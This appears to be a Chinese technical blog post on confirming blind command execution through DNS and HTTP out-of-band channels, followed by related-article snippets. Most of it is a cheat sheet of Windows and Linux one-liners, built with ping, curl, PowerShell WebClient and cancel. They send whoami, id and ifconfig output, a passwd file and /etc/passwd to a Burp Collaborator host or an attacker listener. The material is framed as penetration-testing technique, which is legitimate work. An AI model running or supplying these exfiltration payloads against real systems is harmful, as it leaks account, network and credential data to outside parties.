linux 测试HTT是否通,利用HTTP、DNS通道测试无回显的命令执行

最新推荐文章于 2024-05-20 15:54:09 发布
最新推荐文章于 2024-05-20 15:54:09 发布
阅读量478 收藏
点赞数
文章标签: linux 测试HTT是否通

windows下通过start命令

for /F %X in ('whoami') do start http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/%X

会使用默认浏览器打开http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/laptop-k77ue954/hp

从burpsuite get请求的uri可以看到whoami内容.

windows下通过ping命令

for /F %i in ('whoami') do ping -n 1 %i.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

发现当当前用户名中带有\时会出现找不到主机,因为域名不可能存在\字符,随采用下面命令更为妥当。

for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

这样把\做分隔符取后面的值ping只显示出hp。

windows存在powershell的情况下

使用powershell进行base64编码并进行http请求

for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/'+$a);

linux下通过ping命令

ping `whoami`.uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

ping命令结合base64编码

ping $(id|base64).uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

linux下通过curl命令

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/`whoami`

curl命令结合base64编码

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/$(id|base64)

遇到有换行等情况下把\n替换为-

curl http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/$(ifconfig|base64|tr '\n' '-')

复制出来把-替换为空

然后base64解码

linux下使用curl -F参数

curl -X POST -F xx=@passwd http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net

linux下使用cancel命令

攻击机nc监听一个端口,靶机执行命令

cancel -u "$(cat /etc/passwd)" -h xxx.2x0.xxx.69:2333

Tech-IN
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
总结来看,文章展示了在复杂环境下的渗透测试技巧和思路,包括对命令执行漏洞的识别、无回显漏洞的处理、DNSlog和自建HTTP服务的数据收集、MySQL UDF的利用以及Shell的反弹获取。这些都是信息安全领域中渗透测试人员...
linux 查看ip地址、域名的网络是否以及get / post 指令
wushuo001的博客
03-21 2万+
1.ping         ping 域名     =====》 检索当前域名对应的ip地址(实例地址) 2.nslookup         nslookup 域名     ====》 检索当前域名对应的ip地址           address项则为该域名或二级域名指向的IP地址          addresses项则为该域名所对应IP地址(实例地址)(不止一个) 3....
linux查看IP、域名、端口的网络是否
糊你一脸白月光
07-16 7658
1. ping # 检索当前域名对应的IP地址 ping 域名 # 查看IP是否 ping IP 2. tlenet # 查看指定IP的端口是否http默认端口为80,https默认端口为443 telnet ip/域名 port 3. wget # 查看地址是否可以链接 wget ip:端口 4. nslookup # 检索当前域名对应的IP地址 nslookup 域名 5. traceroute # 追踪域名连接到的位置,看最后一个ip地址是本网的还是合作商的
linux测试http协议是否,详解Linux中的HTTP协议
weixin_28713083的博客
05-12 2166
详解Linux中的HTTP协议HTTP(HyperTextTransferProtocol)超文本传输协议,是Internet上面最常用的协议,过该协议,可以在浏览器浏览网上各种丰富多彩的文字与图片信息,HTTP获取资源的方式,在http/0.9版的时候只有GET一种,直接从服务器获取资源到本地,例如GET/p_w_picpaths/logo.gifHTTP/1.1,表示从/p_w_pi...
linux 测试HTT是否,快速测试端口的连性(HTTP/HTTPS)
weixin_35348268的博客
05-12 2291
[root@VM_139_74_centos gogs]# openssl s_client -connect xxxxxx.com.cn:443^[[A^C[root@VM_139_74_centos gogs]# openssl s_client -connect github.com:443CONNECTED(00000003)depth=2 C = US, O = DigiCert Inc...
linux系统中如何验证网络端口
chengxue_liuliuliu的博客
12-06 1万+
快速诊断网络端口的方法,干货满满
回显漏洞测试及SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞及SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
Python3 执行系统命令并获取实时回显功能
09-19
对于需要实时监控命令执行过程的应用场景,推荐使用`subprocess`模块的方法,因为它支持更复杂的交互操作并且更易于控制。而`os.popen`方法虽然使用简单,但在复杂场景下的灵活性较低。在实际应用中可以根据具体需求...
易语言执行DOS命令回显模块
08-30
.子程序 CMD命令, 文本型, 公开, 写入要执行的DOS语句,类型:文本型 .参数 命令, 文本型 执行DOS命令并以文本型返回结果
linux ping https是否连接
最新发布
ZeroKoop
05-20 517
Linux系统中,ping常用于测试网络上另一台主机的可达性。它使用的是ICMP协议,这是一种设计用来处理网络信问题的协议。HTTPS则是一种安全的网络传输协议,它使用SSL/TLS加密。如果你想要测试到某个HTTPS服务器的连接,你可以使用curl或wget命令。这些命令会尝试发起HTTPS连接,并返回结果。
HTTP协议 - 协议格式
热门推荐
zhaoneiep的专栏
04-15 5万+
1. 命令行窗口中用telnet测试HTTP协议 HTTP消息是由普ASCII文本组成。消息包括消息头和数据体部分。消息头以行为单位,每行以CRLF(回车和换行)结束,消息头结束后,额外增加一个CRLF,之后内容就是数据体部分了。我们可以在命令行窗口,过TELNET,来测试HTTP协议。1. 使用telnet连接到HTTP服务器,如要从g
linux 测试网络连性方法
被生活耽误的旅行者
11-15 1万+
网络连测试方法
linux命令查看url是否能连,如何快速查看您的Linux服务器是否遭到来自某个IP地址的DDoS攻击?...
weixin_34247523的博客
04-29 1264
原标题:如何快速查看您的Linux服务器是否遭到来自某个IP地址的DDoS攻击? 如果您的数据中心中有Linux服务器,或者将它们托管在云服务器(比如AWS、谷歌云或Azure)上,不能因为您所部署的操作系统就想当然地认为它们是安全的。即使Linux是市面上最安全的操作系统之一,它也并非尽善尽美。实际上,针对该平台的攻击有所增加,随着Linux日渐普及,攻击会愈演愈烈。您在做什么?如果您怀疑其中一...
记录命令脚本调用http请求,进行判断某一服务是否成功启动的bat/shell脚本写法
一颗开花的术
11-22 2946
最近在做CI/CD,其中就不乏编写脚本,在进行新版本发布后,需要重新启动程序,这里需要等待程序启动成功后,再进行测试脚本的执行。在Linux系统下直接使用 curl 命令调用http,非常方便。在windows下,我安装了curl,进行尝试,直接在cmd窗口中调用,命令输出为我期待的结果,但是写入bat中捕获不了输出结果,所以最后windows下采用的自己编写java程序进行判断的方式。 linu...
(转)测试端口(四种方法)
weixin_30381317的博客
08-30 3189
一般情况下使用"telnet ip port"判断端口.接下来过本文给大家分享四种方法测试端口,感兴趣的朋友一起学习吧 一般情况下使用"telnet ip port"判断端口,其实测试方法不止这一种,还有很多种方法,下面小编给大家分享了几种方法,具体内容请往下看: 准备环境 启动一个web服务器,提供端口. [wyq@localhost ~]$ python -m Simple...
linux 测试端口(四种方法)
wit_cx的博客
08-20 8063
针对Linux系统:有1、2、3、4四种方法 针对Windows系统:有2、5两种用方法 一般情况下使用"telnet ip port"判断端口,其实测试方法不止这一种,还有很多种方法,下面小编给大家分享了几种方法,具体内容请往下看: 准备环境 启动一个web服务器,提供端口. [wyq@localhost ~]$ python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ...    用其它web服务器.
curl命令测试网络请求中DNS解析、响应时间
weixin_30540691的博客
04-03 249
https://blog.csdn.net/dreamer2020/article/details/78152576 转载于:https://www.cnblogs.com/dongruiha/p/8710906.html
linux查看网络url是否
oJiaKeChong1234的博客
05-23 1万+
第一步: 1:curl http://esg-oauth-bx.paic.com.cn/oauth2/access_token 没结果 (经常用于测试一台服务器是否可以到达一个网站) 2:host esg-oauth-bx.paic.com.cn esg-oauth-bx.paic.com.cn has address 30.4.27.213 (查看主机ip地址) 3 telnet ...
linux如何查看http是否禁用,如何在CentOS 7.5上查看、禁用SELinux
weixin_30125993的博客
05-15 755
SELinux(安全增强型Linux)是一个 Linux 内核安全模块,允许管理员和用户更好地控制访问控制。 它允许基于 SELinux 策略规则进行访问。SELinux 策略规则指定进程和用户如何相互交互以及进程和用户如何与文件交互。如果没有专门允许访问的 SELinux 策略规则,例如打开文件的进程,则拒绝访问。SELinux 有三种模式:强制执行:SELinux 允许基于 SELinux 策...
Linux命令执行漏洞利用详解-Web攻防训练营
利用命令执行漏洞,攻击者可以巧妙地构造URL,比如 `http://192.168.1.106/cmd3.php?cmd=127.0.0.1;ifconfig`,这将执行`ping -c4 127.0.0.1`后立即执行`ifconfig`命令,显示系统的网络接口配置信息。这种方式可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值